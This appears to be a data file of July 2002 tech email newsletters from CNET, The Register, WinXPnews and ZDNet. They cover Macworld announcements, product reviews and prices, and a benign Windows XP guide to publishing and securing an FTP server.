Â Advertise        Copyright 2002 CNET Networks, Inc. All rights reserved.          .</t>
  </si>
  <si>
    <t xml:space="preserve">
Digital Dispatch Weekly Newsletter
All CNET
 The Web
Â 
Macworld 2002: New iPods, bigger iMac and more
Dell squeezes Pentiums into notebooks
Microsoft sweetens Mac Office offer
MSN previews next Net service
Future fuzzy for Adobe camera software
More CNET NewsOpera 6.04FileMaker Pro 6.0v2Balls of Steel Patch 1.3Marine Aquarium 0.99.0 (for the Mac)Samsung ML-1430 laser printerÂ 
In HardwareUnitech 2U4U DMR-300 MP3 player 
In ElectronicsVideo Explosion Deluxe 
In SoftwareSony Ericsson T68 
In Wireless
 July 18, 2002						--Janice Chen,						editor in chief,						CNET Reviews
 Dear readers,The majority of PC users may run Windows, but Microsoft can't
touch the passion that Mac users bring to computing. This week,
Apple devotees gathered in New York to find out what their guru,
Steve Jobs, has in store for them. They were not disappointed,
with offerings ranging from the new iMacs, which continue to push
the boundaries of the PC form factor, to updated iPods that
include more memory, better menus, and compatibility with
Windows. Read the 
full coverage from 
CNET's News.com. 
Readers mourn Gene Kan2GHz to goCheck out the first 2GHz portable powerhouses from Dell and WinBook that push the performance envelope.
	â€¢ IBM thin-and-light ThinkPads fit to a T	â€¢ HP xe4500: the last of the OmnibooksMost popular products
Notebooks
	1. Gateway 600XL
	2. Dell Inspiron 2600 series	3. Dell Inspiron 8200 series
	4. Toshiba Satellite 2400-S251
	5. Toshiba Satellite 5105-S607
 See all most popular notebooks
PIMs on the side
Whatever happened to the straightforward, dedicated PIM?
   PIM/contact managers, such as the ubiquitous Outlook and
   Lotus, pushed them to the sidelines. But a few PIMs survived
   this enforced obscurity. If you need a plain PIM that doesn't
   cost a fortune, one of these may tickle your fancy.
More softwareApple eMac not just for education anymore
Ideally suited to students living in small spaces and home
   users with basic needs, the eMac is an attractive, adequately
   speedy, and easy-to-use PC without the flat-panel iMac's
   relatively high price. Wondering whether to go CRT or
   flat-panel? Read our review.
More desktopsRead the reviewÂ |Â 
   Check latest prices
MiniDV maestro
Sony's DCR-VX2000 gives prosumers a versatile tool for
   capturing high-quality digital video. With three CCDs, smooth
   performance, and excellent low-light capability, this
   camcorder meets the demands of avid videographers where lesser
   cameras fail.
More in digital photoRead the reviewÂ |Â 
   Check latest pricesCordless phones: the other wireless devices
In the market for a new cordless phone but don't know whether
   to buy a 900MHz or 2.4GHz model or which manufacturers offer
   the best products? No sweat: check out our new line coverage to
   find the phone that fits your personal style and needs.
More in wireless phonesÂ Readers mourn Gene Kan
Peer-to-peer pioneer dies, Macworld kicks off in Manhattan, and
the PayPal/eBay merger is not going so well.--Laura Lindhe, executive editor, CNET Tech Trends
1
Gene Kan:   Gnutella open-source guru Gene Kan, who died on June
   29 in an apparent suicide, was clearly beloved by the CNET
   community. Last week, search requests for information on
   25-year-old Kan far outweighed the kind of requests on
   products and companies I usually see. A pioneer in the
   peer-to-peer space, many credit him with legitimizing file
   sharing--making it about more than music, according to Wired
   News.
2
Macworld:   The annual Apple lovefest in New York is always a
   good show, whether or not Steve Jobs has anything real to
   announce. So far, it looks like Apple has already surprised a
   few by announcing the release of QuickTime 6.0 (see No. 7),
   which many thought would get bogged down in a licensing
   quagmire.
   3
PayPal:
   It's been a rocky road thus far for the eBay and
   PayPal deal. Soon after eBay announced it was buying PayPal
   for $1.5 billion, shareholders filed a lawsuit claiming that
   PayPal's price tag was too low. This week, PayPal is being
   subpoenaed by the New York attorney general in regard to its
   involvement with online gambling transactions.
   4
Wi-Fi:   I'm just going to leave this common term for 802.11 up
   on the Buzz Meter permanently. This time, Wi-Fi is getting
   interest because of a possible pact between tech heavyweights,
   including Intel, AT&amp;T Wireless, and Verizon Communications, to
   build wireless access places across the nation in public areas
   where people would want to launch onto the Net, such as
   airports.
5
eMac:   This is the for-education-only computer that consumers
   wanted so badly that Apple released it to them. The CNET
   review is out, and here's the word: the eMac is what the iMac
   used to be. Basically, it's an easy-to-use, fairly inexpensive
   computer for users who don't need to do much besides word
   processing and accessing the Web.
	For more Buzz, click here.The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</si>
  <si>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 xml:space="preserve">
CNET Cell Phone Newsletter
Wireless
 			All CNET
 			The Web
			Â 
July 18, 2002Cordless phones: the other wireless devices
Samsung SPH-A460
What phones are hot in Asia--updated
Wireless Top 5sTop 5 AT&amp;T Wireless cell phones
Top 5 Sprint PCS phones
Top 5 Verizon Wireless cell phones
All Top 5s
Next-generation MP3 playersThese three hard drive-based MP3 players turn last year's models into paperweights.
	â€¢ Mojo rising: TDK's new MP3 CD player
	â€¢ The Nomad Jukebox 3 breaks new groundMost popular
MP3 &amp; Audio
	1. Creative Labs Nomad Jukebox 3
	2. Digitalway MPIO-DMK (128 MB)
	3. Bantam Interactive Explor BA350
	4. iRiver SlimX iMP-350
	5. Sonicblue Rio Volt SP250
 See all most popularCordless phones: the other wireless devicesIn the market for a new cordless phone but don't know 
whether to buy a 900MHz or 2.4GHz model or what manufacturer 
offers the best product? No sweat--check out our new line 
coverage to find the phone that fits your personal style 
and needs.Read the reviews Samsung SPH-A460The update to the SPH-A400 offers some cool enhancements, 
such as an external LCD. Is this the flip phone of the 
moment for Sprint PCS service? 
Read the review
Â |Â Check latest pricesWhat phones are hot in Asia--updatedWonder what people are talking on over on the other side 
of the Pacific? Check out the most current top 10 list from 
our sister site in Singapore.
See the list
Live tech help; submit your question now
CNET News.com: Top CIOs on the future of IT
Find a job you love, with more than 1 million postings
ZDNet: This IT director has had enough of Microsoft
May Editors' Choice award: Pioneer's home-theater system, the HTS-910DVThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          </t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
-----------------------------------    To unsubscribe from this daily news update, see the instructions at
    the end of this message.Software    JPEGs are not free: Patent holder pursues IP grab
    And Sony's already coughed up
        http://www.theregister.co.uk/content/4/26272.html    Mac users outraged at iTools, upgrade taxes
    Read my lips: pony up
        http://www.theregister.co.uk/content/4/26269.html    Amazon opens web services kimono
    But where's Henry Raddick?
        http://www.theregister.co.uk/content/4/26267.htmlPersonal Hardware    Hitachi creates splash with water cooled P4 notebook
    Well no, actually. The idea is it doesn't splash...
        http://www.theregister.co.uk/content/54/26273.htmlSemiconductors    AMD chalks up huge loss, admits to extended red zone
    AMD up agin it may be a sign the economy's returning to normal...
        http://www.theregister.co.uk/content/3/26256.htmlInternet    Fair Use advocates silenced by Big Brother
    Commerce Dept. doesn't want to hear it
        http://www.theregister.co.uk/content/6/26275.html    Net access at work is a perk, say employees
    Or not, as the case may be
        http://www.theregister.co.uk/content/6/26270.html    'Dotcom millionaire' pulls out of porn
    Benjamin Cohen refocuses 
        http://www.theregister.co.uk/content/6/26268.html    Virgin.net pilots broadband
    Full launch in September
        http://www.theregister.co.uk/content/6/26262.html    BT ordered to cut cost of Net access
    Don't you love it when Oftel talks tough?
        http://www.theregister.co.uk/content/6/26258.html    Internet monopoly alert!
    Verisign up to its old tricks again
        http://www.theregister.co.uk/content/6/26254.html    Copyright enforcer Ranger Online caught stealing content
    Do as we say, not as we do
        http://www.theregister.co.uk/content/6/26250.htmlNet Security    Symantec buys SecurityFocus, Riptech, Recourse
    So that's who's got the cashflow...
        http://www.theregister.co.uk/content/55/26255.htmlBusiness    Nokia shares slip on lowered estimates 
    Upsy-daisy
        http://www.theregister.co.uk/content/7/26271.html    AOL "cooked books" as dot.com bubble burst
    Revenue "not of highest quality". Right
        http://www.theregister.co.uk/content/7/26264.html    Redbus row rumbles on
    Cliff launches Portal of Discontent
        http://www.theregister.co.uk/content/7/26260.html    Symantec buys SecurityFocus, Riptech, Recourse
    So that's who's got the cashflow...
        http://www.theregister.co.uk/content/7/26255.html    Reading the runes of IBM's Q2s
    6 per cent down, but maybe good all the same
        http://www.theregister.co.uk/content/7/26253.htmlThe Vulture Central Mailbag    FoTW: Bad language breeds Bad language
    LettersC# barbs fall flat
        http://www.theregister.co.uk/content/35/26266.htmlSite News    Cash'n'Carrion sinks claws into Nigerian 419 scam
    You read the email, you sent the cash, now wear the shirt
        http://www.theregister.co.uk/content/31/26259.htmlBootnotes    Deloitte Consulting rebrands as mineral water
    All hail Braxton!
        http://www.theregister.co.uk/content/28/26265.html    Hello, I'd like to speak to Dr Really Evil please...
    404- Bond villain Not Found
        http://www.theregister.co.uk/content/28/26261.html    Deloitte Consulting has Monday: on its mind
    More: rebranding: malarkey: from: the: wonderful: world: of: consultancy:
        http://www.theregister.co.uk/content/28/26257.htmlThe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</si>
  <si>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
WinXPnewsâ„¢a:link {color: #b04040; font-weight: bold;}
a:visited {color: #804040; font-weight: bold;}
a:active {color: #ff0000; font-weight: bold;}
a:hover {color: #ff0000; font-weight: bold;} WinXPnewsâ„¢ E-Zine
Tue, Jul 9, 2002 (Vol. 2, 27 - Issue 33)
Feel free to forward this newsletter to other WinXP enthusiasts.
Read this newsletter online here:http://www.winxpnews.com/?id=33
For a quick unsubscribe (gasp!) click here:http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com
Time To Patch Your Windows Media Player
Â Â Â This issue of WinXPnewsâ„¢ contains:
Â EDITOR'S CORNER
How to Publish Your Windows XP FTP Server to the InternetHINTS, TIPS, TRICKS &amp; TWEAKSAllow Dial-up Connections to Synchronize Time with Internet Time ServersHOW TO'S: ALL THE NEW XP FEATURESHow to Secure an FTP Server on Windows XP ProfessionalWINXP SECURITY: UPDATES &amp; PATCHESCumulative Patch for Windows Media PlayerCumulative Patches for Excel and Word for WindowsUPGRADING &amp; COMPATIBILITY ISSUESA Computer May Hang During a Heavy Load with an Ericsson HIS ModemKnowledge Base Search Center - If it is Not Broke, Do Not Break it!WINXP CONFIGURING &amp; TROUBLESHOOTINGA Description of the Repair Option on a Local Area Network or High-Speed Internet ConnectionKeyboard and Mouse Do Not Work When You Start WindowsHow to Deploy Windows XP Images from Windows 2000 RIS ServersFAVE LINKSThis Week's Links We Like. Tips, Hints And Fun StuffBOOK OF THE WEEKWindows XP Power Tools
Â Â Â SPONSOR: iHateSpam - Eliminate Irritating Junk Email
Â Irritated with porn, bogus business offers and viagra ads in your mailbox?
Angry about losing your valuable time deleting all that junk? Need a spam-
blocker that eliminates this annoying spam? Stop the spam in your inbox
with iHateSpam. It gives you control over the ever increasing flood of 
junk email. Runs under Windows 95/98/ME/NT/2000/XP. Best of all, the limited
time Intro Offer is just $19.95 with online delivery of full product and a 
30-day money back guarantee. This is a real no-brainer. Get Your Copy Now!
Visit iHateSpam - Eliminate Irritating Junk Email for more information.
Â Â Â EDITOR'S CORNER
Â 
How to Publish Your Windows XP FTP Server to the Internet
Several of you wrote in about last week's article on installing an FTP Server. You said "that was great, but you only told half the story". You wanted to know two more things:How to make the FTP Server available to Internet users
How to secure the FTP ServerThere are several ways to make an FTP server on the internal network available to users on the Internet. These methods are referred to as "Server Publishing". You can use a Windows XP computer running Internet Connection Services (ICS) to publish a server on your internal network.Let's take a look at a common scenario. You have a Windows XP computer connected to the Internet with an always-on cable or DSL connection. You have another computer on your private network also running Windows XP. You've installed the FTP Server on this internal network computer and put files into the FTP folder. Now you want Internet users to connect to the FTP Server through the ICS computer directly connected to the Internet.You can do this with the Windows XP ICS! Here's how:Go into the Network Connections window. You can get there from the Network applet in the Control Panel.
Right click the network interface directly connected to the Internet and click Properties.
Click on the Advanced tab in the connection's Properties dialog box. Put a checkmark in the Internet Connection Firewall checkbox. Always make sure the Internet Connection Firewall (ICF) is enabled when you connect a computer directly to the Internet.
Click the Settings button, then click on the Services tab in the Advanced Settings dialog box.
Now click the Add button. This brings up the Service Settings dialog box. Type in My FTP Server in the Description of service text box. In the Name or IP address text box, type in the IP address of the computer on your private network that's running the FTP server. Since you're using ICS, it'll have an IP address like 192.168.0.x, where x is different for each machine on your network. You might want to manually assign the IP address the FTP Server already has, so that it doesn't change in the future. You can find out what IP address your FTP server is using by opening a command prompt at the FTP server and typing in the command ipconfig. That will give you the IP address the FTP Server is using. Back to the Service Settings dialog box, select the TCP option button. For the External Port and the Internet port, put in the port number you assigned to the FTP server on your internal network. Read this week's How To section to see how to change the listening port number. Clic!
k OK
Click OK, and then click OK one more time! You might need to disable and enable the adapter after making the change. You can do that by right clicking the always-on interface.The procedure is very similar for dial-up connections. However, there are problems with dial-up connections (and many always-on connections) because the IP address on the external interface of the ICS computer changes over time. Next week I'll share with you a cool way you can get around this problem by using something called a "dynamic DNS service". I've used one for years, and it works great. Make sure to tune in next week for the details.There you have it. Is server publishing in your future? Have any questions on the method I described above? If so, let me know! There are lots of ways you can publish services. Tell me how you do it, and tricks you've learned along the way. If you're having problems with server publishing, let me know about those too! I'll be sure to include what I learn from you in upcoming newsletters.Until next week,
Tom Shinder, Editor
(email us with feedback: feedback@winxpnews.com)
Â Â Â SPONSOR: Is Your PC Spying On You?
Â You are surfing the Web. Check out sites, download some music or
software that might be cool. Guess what? Your PC might have picked up
a cyber transmitted disease (CTD). These pests might now be monitoring 
what you are doing and report this back to their "black hat" owners 
and reveal your personal information. PestPatrol kills 'em all off. 
Get your copy on the online shop for just 30 bucks with immediate online delivery. Protect your PC and your confidential data!
Visit Is Your PC Spying On You? for more information.
Â Â Â HINTS, TIPS, TRICKS &amp; TWEAKS
Â 
Allow Dial-up Connections to Synchronize Time with Internet Time Servers
Do you use a dial-up connection but can't get your machine to synchronize its clock with an Internet time server when the Internet Connection Firewall (ICF) is enabled? If so, here's a tip Richard Surry sent in on how to fix the problem:Open your Network Connections window from the start menu.
Right click on your modem (or other dial-up connection) and click Properties.
Click on the Advanced tab. You already have a checkmark in the box that enables the ICF. Click on the Settings button.
Click on the Services tab, then click on the Add button in the Services tab.
That should open the Service Settings dialog box. In the Description box, put in Internet Time Service. For the Name or IP address of the computer hosting this service on your network, type in 127.0.0.1. Select the TCP  protocol option button. For both the external and internal port numbers, type 123.
If you're online, disconnect and reconnect. Now synchronize the time by double click on the clock in the system tray and going to the Internet Time tab.This is an interesting tip, and it represents an even more interesting problem. For you network geeks out there, I'll ask you this question: Why should we allow unsolicited inbound connections for the Internet Time Service? The ICF should not block responses to solicited outbound connections, so why should we have to enable reverse NAT to make this work?
Â Â Â HOW TO'S: ALL THE NEW XP FEATURES
Â 
How to Secure an FTP Server on Windows XP Professional
Last week we went over how to install the Windows XP FTP Server. It will work fine after going through the steps outlined last week, but several of you asked for more information on how to secure the FTP Server because you wanted to connect it to the Internet. It's a very good idea to understand how FTP security works before putting the server on the Internet. Here are some suggestions:Open the Internet Information Services console from the Administrative Tools menu. In the left pane of the console, expand your server name and then expand the FTP Sites node.
Right click on the Default FTP Site and click the Properties command.
Click on the FTP Site tab. Notice that the default TCP Port is set to 21. This is the well-known port for FTP. You can increase security a bit by changing this port to another value that's in the 1026-65534 range. This secures it from poorly motivated click-kiddies and also allows you to get around your ISP blocking incoming connections to TCP port 21. Friends who connect to your FTP server will need to change the port number on their FTP client software as well.
The Windows XP FTP server has a hard coded limit of 10 simultaneous connections. You might want to change this to a lower number to reduce the chance of a LAN party on the external interface of the FTP server.
Put a checkmark in the Enable Logging checkbox. Click the Properties button to the right of the log format drop-down list box. Click the Daily option button on the General Properties tab. On the Extended Properties tab, select all of the Extended Properties. Click OK.
Click on the Security Accounts tab. Place a checkmark in the Allow only anonymous connections checkbox. This prevents users from sending username and password credentials to the FTP server. You don't want users to send credentials because those credentials are sent in "clear text", which can be read by anyone who's listening on the wire.
Click the Messages tab. Enter a Welcome message, an Exit message, and a message users will see if there are no available connections.
Click on the Home Directory tab. Make sure there is a checkmark in the Read and Log Visits checkboxes. REMOVE the checkmark in the Write checkbox. Note the location in the Local Path text box. Navigate to that path in the Windows Explorer.
Right click on the FTPROOT folder and click Properties.
Click on the Security tab. Make sure that SYSTEM has Full Control. Assign the IUSR_ account READ access only. Remove all other permissions for the IUSR account. Make sure you give Adminstrators Full Control tool. This allows you, the administrator on the FTP Server computer, to add, remove and change files in the FTPROOT folder.Stop and restart the FTP Server. Now your FTP server is secure and Internet bad guys won't be able to use it to distribute porno and bootlegged software.
Â Â Â WINXP SECURITY: UPDATES &amp; PATCHES
Â 
Cumulative Patch for Windows Media Player
I think it was a couple months ago when I wrote about some serious problems with the Windows Media Player (WMP). At that time you could download a "cumulative" patch that would update the Media Player with the latest security fixes. Well, it's time to download another "cumulative" patch! A couple other problems were found in WMP that could cause some problems. To read more about the problem head on over to:
http://www.winxpnews.com/rd/rd.cfm?id=020709SE-WMP_PatchYou'll also find the download locations for Windows Media Player versions 6.4, 7.1 and 8.0 (XP) on that page.
Cumulative Patches for Excel and Word for Windows
If you run Microsoft Word or Excel, versions 2000 or 2002 (XP), then you need to head on over to the Microsoft site to download some security fixes. These fixes handle security glitches that could get you in trouble if you don't take care of them! Head on over to Microsoft's site where you can find individual fixes for each program. You only need download the fix that applies to your computer:
http://www.winxpnews.com/rd/rd.cfm?id=020709SE-Word_Excel_Patch
Â Â Â UPGRADING &amp; COMPATIBILITY ISSUES
Â 
A Computer May Hang During a Heavy Load with an Ericsson HIS Modem
If your computer has a Ericsson HIS modem, you might experience a dreaded blue screen and see the message IRQL_NOT_LESS_OR_EQUAL or DRIVER_CORRUPTED_EXPOOL. The problem is that you're downloading too much and your poor modem can't keep up! Microsoft recognizes that this isn't a problem with the modem, but with the modem driver. To download a fix visit Microsoft's site. After getting the fix, you can download as much as you like without worrying about blue screens!
http://www.winxpnews.com/rd/rd.cfm?id=020709UP-HIS_Modem
Knowledge Base Search Center - If it is Not Broke, Do Not Break it!
It wasn't so long ago when you could search the Microsoft Knowledge Base for articles that came up in the last 3 days, 7 days, 14 days, 30 days, 90 days and 6 months. It was great! But Microsoft decided to "fix" the Knowledge Base search page, and now it really sucks! It's hard to find things that used to come up easily, the site is often down, and searching based on age of articles just doesn't work anymore.Try this: go to:
http://support.microsoft.com/default.aspx?ln=EN-US&amp;pr=kbinfo&amp;
and on the left side of the page select Windows XP in the top drop down list box. Don't put anything in the For solutions containing...(optional) text box. Leave the Any of the words entered option selected in the Using drop down list box. For Maximum Age select 3 days. For Results Limit select 150 articles. Click Search Now. Whoa! Nothing. OK, it's reasonable to see no articles related to Windows XP in the last 3 days. Try again, this time using 7 days. Whaat? Still no articles. OK, it was a holiday week in the USA last week. Let's try 14 days. Nothing again! That seems sort of strange, doesn't it? Let's give it another try with 30 days. Still no articles! What's going on here? Keep trying for 6 months and one year. You still won't find anything. It's pretty sad, because this used to work.
Â Â Â WINXP CONFIGURING &amp; TROUBLESHOOTING
Â 
A Description of the Repair Option on a Local Area Network or High-Speed Internet Connection
Here's the answer to a question I've had for a long time. What the heck does that "Repair" option for a network connection actually do? It's not in the help file, but it's on the Microsoft Web site. Here's what it does:Sends an ipconfig /renew
Flushes the ARP cache with a arp -d
Reloads the NetBIOS name cache with a nbtstat -R
Updates its WINS server with an nbtstat -RR
Clear out the DNS client cache with an ipconfig /flushdns
Reregisters the client with a DDNS server with a ipconfig /registerdnsCheck out the original article over at:
http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Repair_Option
Keyboard and Mouse Do Not Work When You Start Windows
Have you been hit with this one? You're working in Windows XP and shut down for the day. The next morning you start up your Windows XP computer and the mouse pointer is stuck! The only way to get it going again is to restart the computer, and for some reason the pointer starts moving again. What's up with that? I still haven't figured that one out, but Microsoft has a KB article that claims it's from a corrupt registry. I doubt that's the case in my situation because the problem is intermittent. But if you find that your mouse is always stuck, you might want to check out:
http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Frozen_Mouse
How to Deploy Windows XP Images from Windows 2000 RIS Servers
Are you planning to roll out lots of Windows XP computers on your network in the near future? If so, you're probably looking for a good way to automate the process. You can use the Windows 2000 Remote Installation Services (RIS) if you're running Windows 2000 Servers on your network. For the basic procedure and some tips, tricks, and gotcha's, check out:
http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Deploy_XP_Images
Â Â Â FAVE LINKS
Â 
This Week's Links We Like. Tips, Hints And Fun StuffBe Afraid, be very afraid - the future of Big Brother in computing
http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Palladium_FAQ
Get Revenge on your computer!
http://www.winxpnews.com/rd/rd.cfm?id=020709FA-PC_Revenge
Pringles Super Spud Boxing
http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Spud_Boxing
Â Â Â BOOK OF THE WEEK
Â 
Windows XP Power Tools
A book full of personal experiences and anecdotes that will equip you with the tips and tricks you need to become an XP afficionado. Coverage includes automating tasks using scripting, the Command Console Survivor Guide, networking, registry, maximizing security/firewalls, hardware, installation/configuration, and database hosting/accessing. The CD contains the best third party utilities around.Step-by-Step Instruction Helps You Harness the Full Power of Windows XP. Whether you're running Windows XP Home Edition or Professional, Windows XP Power Tools arms you with the advanced skills you need to become the ultimate power user. Full of undocumented tips and tricks and written by a Windows expert, this book provides you with step-by-step instructions for customization, optimization, troubleshooting and shortcuts for working more efficiently. A must-have for power users and network administrators, Windows XP Power Tools includes a CD filled with power tools including security, e-mail, diagnostic and data recovery utilities.http://www.winxpnews.com/rd/rd.cfm?id=020709BW-XP_Power_Tools
Â Â Â ABOUT WINXPNEWSâ„¢
Â 
Â What Our Lawyers Make Us SayThese documents are provided for informational purposes only. The information
contained in this document represents the current view of Sunbelt Software
Distribution on the issues discussed as of the date of publication. Because
Sunbelt must respond to changes in market conditions, it should not be
interpreted to be a commitment on the part of Sunbelt and Sunbelt cannot
guarantee the accuracy of any information presented after the date of
publication.INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM
FROM INFRINGEMENT.The user assumes the entire risk as to the accuracy and the use of this
document. This document may be copied and distributed subject to the
following conditions: 1) All text must be copied without modification and all pages
must be included; 2) All copies must contain Sunbelt's copyright notice and any
other notices provided therein; and 3) This document may not be distributed
for profit. All trademarks acknowledged. Copyright Sunbelt Software
Distribution, Inc. 1996-2002.
Â About Your Subscription to WinXPnewsâ„¢This is a posting from WinXPnews. You are subscribed as cncnvc@fsg.comTo manage your profile, please visit our site by clicking on the following link:http://www.winxpnews.com/login.cfm?id=9665862091709486
For a quick unsubscribe (gasp!), click here:http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
CNET Shopper Newsletter: Desktops &amp; Notebooks EditionShopper
											All CNET
											The Web
										Â 
									1
Canon PowerShot S40
2
Canon PowerShot G2
3
Gateway 600XL
4
Dell Latitude C400
5
Cyber Shot DSC-F707
Â 
		All most popular
 Atlas Micro GS 9800
											â€¢ Pentium 4 2.53 GHz
											â€¢ 512MB DDR SDRAM
											â€¢ 40GB hard drive
											â€¢ CD-RW/DVD-ROM
											â€¢ 19-inch CRT
											â€¢ nVidia GeForce4 Ti 4200
											â€¢ Just $2,099Peripherals for your desktop:
Canon S900 photo printerWacom Intuis2 6X8 tabletWireless Keyboard &amp; Mouse
ViewSonic ViewPanel VP 181Gateway 600XL
								â€¢ Pentium 4-M 1.8GHz
								â€¢ 256MB RAM, 40GB hard drive
								â€¢ 15.7-inch TFT active matrix
								Â Â Starting at $2,899 
Dell Dimension 4000
								â€¢ Pentium 4 1.7GHz to 2.53GHz
								â€¢ 128MB to 1GB
								â€¢ Up to 120GB hard drive
								Â Â Starting at $739 
Dell Inspiron 2600 series 
								â€¢ 1GHz to 1.7GHz
								â€¢ 128MB to 256MB RAM
								â€¢ 20GB to 40GB hard drive
								Â Â Just $999 
HP Pavilion n5450 
								â€¢ Pentium III 850MHz
								â€¢ 128MB RAM, 20GB hard drive
								â€¢ 15-inch TFT active matrix 
								Â Â Just $1,099 
Gateway Solo 1450SE
								â€¢ Intel Celeron 1.2GHz
								â€¢ 128MB RAM, 20GB hard drive
								â€¢ 14.1-inch TFT active matrix 
								Â Â Just $1,158  
Did you know that ChannelOnline's StoreSite enables you to
set up a private storefront with your company name and logo
in less than an hour?Your customers can view quotes you have created for them,
search the product database, build their own quotes based
on the pricing you've predetermined for them, and place
orders with you online, 24/7.Sign up now to give your customers a whole new level of
service.Tell me more about ChannelOnline.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET TV &amp; Radio
Music CenterThe e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Change e-mail formatÂ |
Â Change e-mail address|
Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          
.</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk Daily NewsletterNeed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FRI JUL 19, 2002Â David CourseyMS/Apple: Can this marriage be saved? (I doubt it)
                Apple is cutting hardware prices, raising software prices, building features into OS X that compete with MS Office, and placing ads urging Windows users to switch. Are these the first signs of an Apple/MS divorce? Here's what I think.
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: The latest chips from Nvidia and ATI Tighter PC security... Encrypt your laptop... Pittman leaving AOL 
Your top tips for shaping up flabby hard drives 
Here's what I think of Jobs's Macworld keynote
TiVo: Why it gets no gold stars for mandatory ads  Crucial Clicks: More from ZDNet           MONITORS    A Porsche you can afford    Brought to you by Samsung and F.A. Porsche, the SyncMaster 171P is a sleek, 17-inch LCD with sharp image quality and snazzy design. But ZDNet reviewers say it's a bit pricey.          Read review      Most Popular Products    Monitors 1. Samsung SyncMaster 151S 2. NEC MultiSync 1550V 3. Envision EN-5100e 4. Samsung SyncMaster 570 V 5. Samsung SyncMaster 955 DF More popular monitors             Â SYLVIA CARRÂ Tighter PC security... Encrypt your laptop... Pittman leaving AOLThe government supports a benchmark that protects computers from hack attacks and   viruses. Plus: A start-up unveils software that lets you easily encrypt data. And AOL   Time Warner COO Bob Pittman is leaving the company. 
 Â DAVID MORGENSTERNÂ Your top tips for shaping up flabby hard drivesAnchorDesk readers know that using defrag software on a regular basis makes their hard drives run smoothly and efficiently. David shares a list of readers' favorite apps, plus advice on preparing drives for the process. QuickPoll results: Would you pay $5 to speed up Web surfing? Â STEPHAN SOMOGYIÂ 
Here's what I think of Jobs's Macworld keynote
                Never one to shy away from Friday-morning quarterbacking, Stephan deconstructs both the good and bad in Steve Jobs's Macworld Expo keynote. Read on for his take on everything from .Mac to the new iMac.
Â STEVE KOVSKYÂ 
TiVo: Why it gets no gold stars for mandatory ads
                First TiVo forced subscribers' machines to record sitcoms they didn't want. Now the company is planting ads on their lists of favorite programs. No wonder TiVo owners have become such a bunch of whiners, says Steve.
Â PRESTON GRALLAÂ 
Want to become a PC know-it-all? Here's how
                Want to be a power user? Wish you could master the inner workings of your PC and create Web pages? Preston has three downloadable guides for tweaking Windows XP, understanding the Registry, and writing HTML.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</si>
  <si>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
Buyer's Alert | July 18, 2002When ordering, make sure the reseller/manufacturer 
provides the rebate coupon you need.
Expires July 31, 2002
Get a car cassette adapter and power adapter FREE with Rio Volt SP250Expires August 31, 2002
$20 off SideWinder Strategic CommanderExpires September 30, 2002
$20 off Rio 600 64MB
$20 off Nike PSA (120)
$20 off RioVolt SP90
Expires March 3, 2003
$10 off Microsoft Natural Keyboard Pro PS2/USB Digital CamerasÂ Â 
1.PowerShot G2Premier merchant:
PC Connection $799
Â 2.PowerShot S30Premier 
            merchant:PC Connection $4993.PowerShot S40Premier merchant:
CDW $5994.PowerShot A405.Cyber Shot DSC-F707Premier merchant:Gateway $445 More Top 
            Selling Products...Â 
Dear Reader,
Basic electronic organizers they're not, but if you're searching 
for a pocket-sized computer for music, movies, and games, then 
these PDAs are well worth a look. All four models feature fast 
processors, large amounts of RAM, and sharp, color screens, which 
make them better choices for rich media than competing products. 
But beyond those basics, these handhelds are very different. You'll 
find three different operating systems: Pocket PC, Palm, and Linux. 
Two have keyboards, one has a built-in Bluetooth radio, and all 
four support various expansion card formats. Most Pocket PCs are 
multimedia friendly; we've picked two that really stand out because 
of features or price. However, none of these are inexpensive models, 
so check out our hands-on reviews to find the high-end handheld 
that you'll be happiest with. Audiovox Maestro PDA-1032
Lowest price: $330
Compaq iPaq H3870
Lowest price: $545
	Sharp Zaurus SL-5500
Lowest price: $367
Sony CLIE PEG-NR70V
Lowest price: $517Â 
Â Â Sony CLIE PEG-T665CWith the CLIE PEG-T665C, Sony took everything good about the 
PEG-T615C--including its terrific color screen and solid 
design--and added a faster processor and MP3 support to make 
quite an attractive Palm OS PDA.Read Review | Check Prices Â Â Â TDK Electronics MOJO 620If you're the type who really likes to categorize and catalog 
your music, this MP3 CD player has everything that you need, 
plus a few never-before-seen extras.
Read Review | Check Prices
Â 
FREE PDA or Printer with select systems!
Buy select Dell systems and choose a Palm PDA or an Epson printer 
FREE (shipping extra), PLUS save up to $300! Limited time offer. 
Small Business only. Click for details.Â 
A friendly reminder from Dell Home SystemsBuy a select new Dell Home System and get your Memory Upgraded 
for free. Hurry! Offer ends soon.
Â 
Â 
Please note 
            that prices fluctuate and may have changed since the sending of this 
            newsletter. Lowest prices listed are usually after rebates (but 
            please check with the reseller, sometimes the rebate is included in 
            their price). 
Handspring Treo 270Price recently dropped 29%			Lowest price: $499
HP PhotoSmart 912XIPrice recently dropped 40%			Lowest price: $299
JVC XV-S502SLPrice recently dropped 45%			Lowest price: $137 
SPECIAL FEATUREDid you know that ChannelOnline's StoreSite enables you to set up
a private storefront with your company name and logo in less than
